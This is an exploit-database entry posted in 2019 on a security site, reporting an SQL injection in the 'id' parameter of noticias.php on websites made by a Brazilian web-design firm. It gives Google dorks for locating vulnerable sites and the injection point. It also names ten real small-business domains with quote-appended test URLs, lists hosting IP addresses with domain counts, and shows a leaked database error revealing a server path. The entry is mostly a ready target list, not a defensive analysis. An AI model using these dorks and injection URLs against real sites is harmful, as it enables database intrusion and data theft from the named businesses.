Criação sitesrapidos.com.br Web Design Brazil SQL Injection

2019.01.16
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:''criação: sitesrapidos.com.br''

############################################################## # Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 16/01/2019 # Vendor Homepage : sitesrapidos.com.br # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''criação: sitesrapidos.com.br'' criação: sitesrapidos.com.br inurl:/noticias.php?id= # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ############################################################## # SQL Injection Exploit : *********************** /noticias.php?id=[SQL Injection] ############################################################## # Example Vulnerable Sites : ************************* [+] sidermetal.com.br/noticias.php?id=3%27 => [ Proof of Concept for SQL Inj ] => archive.is/46g98 [+] bockrs.com.br/noticias.php?id=3%27 [+] sanderagropecuaria.com.br/noticias.php?id=3%27 [+] alcancyassessoria.com.br/noticias.php?id=4%27 [+] garagetec.com.br/noticias.php?id=68%27 [+] ferragemlampiao.com.br/noticias.php?id=1%27 [+] marcelokuhn.com.br/noticias.php?id=1%27 [+] genialrs.com.br/noticias.php?id=4%27 [+] btiseguros.com.br/noticias.php?id=70%27 [+] correspondentecaixars.com.br/noticias.php?id=5%27 Note : (63.247.92.74) => There are 31 domains hosted on this server. Note : (192.185.170.138) => There are 159 domains hosted on this server. Note : (187.45.193.229) => There are 549 domains hosted on this server. Note : (187.45.210.66) => There are 95 domains hosted on this server. Note : (192.185.170.14) => There are 60 domains hosted on this server. Note : (192.185.31.71) => There are 194 domains hosted on this server. ############################################################## # SQL Database Error : ********************** Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/httpd/vhosts /sanderagropecuaria.com.br/httpdocs/noticias.php on line 42 ############################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##############################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top